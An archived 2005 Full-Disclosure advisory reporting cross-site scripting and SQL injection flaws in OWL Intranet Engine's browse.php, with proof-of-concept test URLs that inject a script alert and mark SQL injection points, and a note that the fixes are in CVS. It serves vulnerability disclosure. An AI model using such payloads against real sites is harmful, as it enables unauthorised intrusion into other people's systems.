[Full-Disclosure] Various Vulnerabilities in OWL Intranet Engine

From: Joxean Koret (joxeankoret_at_yahoo.es)
Date: 01/01/05

  • Next message: Stephen Jimson: "[Full-Disclosure] Microsoft WINS Exploit (port 42) released"
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vuln@secunia.com
    Date: Sat, 01 Jan 2005 19:52:48 +0000
    
    
    
    

    ----------------------------------------------------------------------------
                   Various Vulnerabilities in OWL Intranet Engine
    ----------------------------------------------------------------------------

    Author: Jose Antonio Coret (Joxean Koret)
    Date: 2004
    Location: Basque Country

    ---------------------------------------------------------------------------

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    OWL 0.7 and 0.8 - Owl is a multi user document repository
    (knowledgebase)
    system written in PHP4 for publishing files/documents onto the web for
    a
    corporation, small business, group of people, or just for yourself.

    Web : http://owl.sourceforge.net/

    ---------------------------------------------------------------------------

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~

    A. Cross Site Scripting Vulnerabilities

    A1. In the script browser various parameters, that are used to write the
    html code, not are verified.

            Test URLS :

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1'><script>alert(document.location)</script>&order=creatorid&sortposted=DESC

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1&order=creatorid'><script>alert(document.location)</script>&sortposted=DESC

    B. SQL Injection Vulnerabilities

    B1. In the browser.php script the following parameters are vulnerables
    to an
    SQL Injection attacks.

            Test URLS :
            

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC

    http://>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20INJECTION]

    The fix:
    ~~~~~~~~

    All problems are fixed in the CVS.

    Disclaimer:
    ~~~~~~~~~~~

    The information in this advisory and any of its demonstrations is
    provided
    "as is" without any warranty of any kind.

    I am not liable for any direct or indirect damages caused as a result of
    using the information or demonstrations provided in any part of this
    advisory.

    ---------------------------------------------------------------------------

    Contact:
    ~~~~~~~~

            Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

    
    

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter:
    http://lists.netsys.com/full-disclosure-charter.html



  • Next message: Stephen Jimson: "[Full-Disclosure] Microsoft WINS Exploit (port 42) released"

    Relevant Pages

    • Various Vulnerabilities in OWL Intranet Engine
      ... Cross Site Scripting Vulnerabilities ... In the script browser various parameters, that are used to write the ... SQL Injection Vulnerabilities ... The information in this advisory and any of its demonstrations is ...
      (Bugtraq)
    • Various Vulnerabilities in OWL Intranet Engine
      ... Cross Site Scripting Vulnerabilities ... In the script browser various parameters, that are used to write the ... SQL Injection Vulnerabilities ... The information in this advisory and any of its demonstrations is ...
      (Full-Disclosure)
    • Help Center Live Vulnerabilities
      ... Live is vulnerable to Sql injection, Script Injection, and Cross Site ... but the most serious of the vulnerabilities mentioned ... There are several script injection vulnerabilities in Help Center Live ... This can be accomplished by an attacker by entering ...
      (Bugtraq)
    • [VulnWatch] PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file re
      ... Multiple vulnerabilities on Absolute News Manager.NET 5.1 ... Multiple vulnerabilities were found on Absolute News Manager.NET 5.1: ... - unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly ... The script '/pages/default.aspx' might also be vulnerable to SQL ...
      (VulnWatch)
    • PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and
      ... Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection ... The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has not been confirmed. ...
      (Bugtraq)